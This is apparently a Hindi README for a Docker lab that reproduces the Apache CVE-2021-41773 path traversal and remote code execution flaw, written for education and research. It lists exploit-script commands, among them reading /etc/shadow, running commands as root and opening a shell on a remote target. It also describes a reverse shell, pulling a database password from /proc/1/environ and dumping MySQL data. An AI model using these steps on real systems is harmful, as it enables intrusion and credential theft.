
Apache CVE-2021-41773 के पथ-भ्रमण और RCE शोषण के लिए Docker-आधारित प्रयोगशाला, Python शोषण स्क्रिप्ट के साथ, जो भेद्यता विश्लेषण और शमन रणनीतियों का प्रदर्शन करती है।
यह रिपॉजिटरी शैक्षिक और अनुसंधान उद्देश्यों के लिए एक नियंत्रित डॉकर लैब वातावरण में सार्वजनिक रूप से प्रकट और पैच की गई कमजोरी का पुनरुत्पादन करता है।
वातावरण जानबूझकर कमजोर है और इसे केवल अलग-थलग परीक्षण वातावरण में ही तैनात किया जाना चाहिए। स्पष्ट प्राधिकरण के बिना सिस्टम का शोषण करने का प्रयास न करें।
इस परियोजना का लक्ष्य कमजोरी विश्लेषण, शोषण और शमन रणनीतियों का प्रदर्शन करना है।
पथ ट्रैवर्सल और रिमोट कोड निष्पादन
# Navigate to the project folder
cd Apache-CVE-2021-41773
# Validate compose syntax
docker compose config
# Start the lab
docker compose up -d --build
# Check that everything is running
docker compose ps
Apache 2.4.49 ने URL पथ सामान्यीकरण में एक बग पेश किया। .%2e (जो .. के बराबर है) जैसे एन्कोडेड अनुक्रमों को ठीक से स्वच्छ नहीं किया जाता है, जिससे हमलावर DocumentRoot से परे निर्देशिका वृक्ष को पार कर सकता है।
यदि mod_cgi सक्षम है और रूट निर्देशिका (/) को Require all granted के साथ कॉन्फ़िगर किया गया है, तो हमलावर कर सकता है:
/bin/sh इंटरप्रेटर के माध्यम से कमांड निष्पादित करना (RCE)exploit.py)कोई बाहरी निर्भरता नहीं — केवल Python मानक पुस्तकालय का उपयोग करता है।
ऑटो python exploit.py कमजोरी जांचें + डेमो के रूप में id चलाएं
फ़ाइल पढ़ें python exploit.py -f /etc/shadow RCE के माध्यम से कोई भी फ़ाइल पढ़ें
RCE python exploit.py -c "whoami" एक एकल कमांड निष्पादित करें
शेल python exploit.py -i इंटरैक्टिव स्यूडो-शेल
कस्टम लक्ष्य python exploit.py -u http://target:8888 रिमोट होस्ट को लक्ष्य बनाएं
सबसे पहले, हम सत्यापित करते हैं कि वातावरण कमजोर है
जैसा कि अपेक्षित था, कमांड आईडी uid=0(root) gid=0(root) groups=0(root) लौटाता है
आइए एक रिवर्स शेल बनाएं :
हम रूट के रूप में लॉग इन हैं
जैसा कि आप देख सकते हैं, /proc/1/environ पर एक गलत कॉन्फ़िगरेशन है, हमें SQL पासवर्ड मिल गया यह असुरक्षित कंटेनर कॉन्फ़िगरेशन के कारण उजागर रहस्यों को प्रकट करता है
निकाले गए क्रेडेंशियल का उपयोग करके, हम MySQL डेटाबेस से कनेक्ट होते हैं, और संग्रहीत डेटा प्रिंट करते हैं

इन कॉन्फ़िगरेशन को उत्पादन वातावरण में कभी भी पुनरुत्पादित न करें।